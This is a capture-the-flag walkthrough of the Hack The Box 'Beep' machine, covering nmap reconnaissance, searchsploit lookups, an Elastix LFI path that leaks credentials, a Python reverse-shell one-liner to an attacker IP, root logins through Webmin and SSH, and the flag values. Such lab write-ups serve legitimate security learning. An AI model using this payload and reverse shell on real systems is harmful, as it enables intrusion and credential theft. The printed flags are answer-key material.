Beep

July 17th, 2020

Beep logo

This is an easy linux box

Tool used

  • browser (Firefox)
  • find
  • nc
  • nmap
  • python
  • searchsploit
  • ssh

Reconnaissance

Nmap

nmap -sC -sV -oA beep 10.10.10.7 -v

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
80/tcp    open  http       Apache httpd 2.2.3
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: UIDL APOP LOGIN-DELAY(0) STLS IMPLEMENTATION(Cyrus POP3 server v2) RESP-CODES TOP USER EXPIRE(NEVER) AUTH-RESP-CODE PIPELINING
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: Completed RENAME OK QUOTA LISTEXT NO X-NETSCAPE ANNOTATEMORE UNSELECT CATENATE RIGHTS=kxte URLAUTHA0001 LITERAL+ CHILDREN IDLE ACL IMAP4 BINARY IMAP4rev1 LIST-SUBSCRIBED THREAD=REFERENCES MULTIAPPEND ID MAILBOX-REFERRALS STARTTLS THREAD=ORDEREDSUBJECT UIDPLUS NAMESPACE ATOMIC SORT=MODSEQ SORT CONDSTORE
443/tcp   open  ssl/https?
|_ssl-date: 2020-07-16T16:42:53+00:00; +6m28s from scanner time.
880/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4445/tcp  open  upnotifyp?
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-favicon: Unknown favicon MD5: 74F7F6F633A027FA3EA36F05004C9341
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com

Here’s what nmap teaches us :

  • port 22 (SSH) OpenSSH 4.3
  • port 25 (SMTP) Postfix
  • port 80 (HTTP) Apache httpd 2.2.3
  • port 110 (POP) Cyrus 2.3.7
  • port 143 (IMAP) Cyrus 2.3.7
  • port 3306 (MYSQL)
  • port 10000 MiniServ 1.570 Webmin

We have some versions, let’s check them for known exploits.

Searchsploit

SSH

Searchsploit SSH

As we can see, there is some exploit to do some “Username Enumeration”. It might be interresting, but at the moment I don’t really need a username. So if I have nothing, I’ll get back to that exploit.

Elastix

Searchsploit Elastix

There is some interesting exploit here.

  • LFI
  • Blind SQL
  • PHP Code Injection
  • RCE

Let’ check for more exploit before going through them.

POP/IMAP

Searchsploit POP/IMAP

Nothing here, the install version is 2.3.7

Webmin

Searchsploit Webmin

The install version is 1.570 so there might be a RCE.

Web

Now let’s check the port with web service.

80/443

Searchsploit Webmin

We have a login page, try some default credentials (found on google) :

  • admin:admin
  • admin:password
  • admin:palosanto
  • admin:mypassword
  • admin:eLaStIx.2oo7

Not working, too bad !

10000

Searchsploit Webmin

Another login page, same as above, trying default credentials :

  • admin:admin
  • admin:password
  • root:root
  • root:password

No valid credentials, let’s look at the exploits that I found thanks to searchsploit.

Exploit

Since there is more exploit found with Elastix, that is were I started. I didn’t found the Elastix version so I tried the first one LFI.

Download the code like so :

searchsploit -m php/webapps/37637.pl

Read the exploit and found the exploit part which is :

#LFI Exploit: 
/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

Nothing difficult here, it’s just a simple LFI, so let’s try it in the browser !

LFI Elastix

Bingo, it’s working and we now have some credentials :

  • amp109
  • jEhdIekWmdjE
  • amp111

And some users :

  • asteriskuser
  • admin
  • asterisk

Let’s go back to the login pages, with our newly gotten creds !

First try with the creds on https://10.10.10.7, with admin:jEhdIekWmdjE.

Elastix login

Nice, we are connected ! But I didn’t found a way to escalate to a shell, too bad ! Go to the next one, which is https://10.10.10.7:10000, with root:jEhdIekWmdjE

Webmin login

Also connected, looking around the sidebar, I found something called “Command Shell”, which let us run command.

Webmin cmd

I want a reverse shell, first launch nc :

nc -lvp 1234

Then I used a python reverse shell found here http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

And there you have a shell as “root” !

nc -lvp 1234
listening on [any] 1234 ...
10.10.10.7: inverse host lookup failed: Unknown host
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.7] 44157
sh: no job control in this shell
sh-3.2# whoami
root

Other method

Nmap tells us that there is port 22 open (SSH), with the credentials that I found before, there may be a way to connect. When I try to connect as root there is an error :

ssh root@10.10.10.7
Unable to negotiate with 10.10.10.7 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1

OpenSSH implements all of the cryptographic algorithms needed for compatibility with standards-compliant SSH implementations, but since some of the older algorithms have been found to be weak, not all of them are enabled by default (https://www.openssh.com/legacy.html).

To solve this issue, I used the command below. For the password I used the one who was reuse which is : “jEhdIekWmdjE”.

ssh root@10.10.10.7 -oKexAlgorithms=+diffie-hellman-group1-sha1
root@10.10.10.7's password: 
Last login: Fri Jul 17 17:31:11 2020 from 10.10.14.4

Welcome to Elastix 
----------------------------------------------------

To access your Elastix System, using a separate workstation (PC/MAC/Linux)
Open the Internet Browser using the following URL:
http://10.10.10.7

[root@beep ~]#

And there you have a “root” shell !

Flags

User.txt

sh-3.2# find / -name "user.txt"
/home/fanis/user.txt
sh-3.2# cat /home/fanis/user.txt 
aeff3def0c765c2677b94715cffa73ac

Root.txt

sh-3.2# find / -name "root.txt"
/root/root.txt
sh-3.2# cat /root/root.txt
d88e006123842106982acce0aaf453f0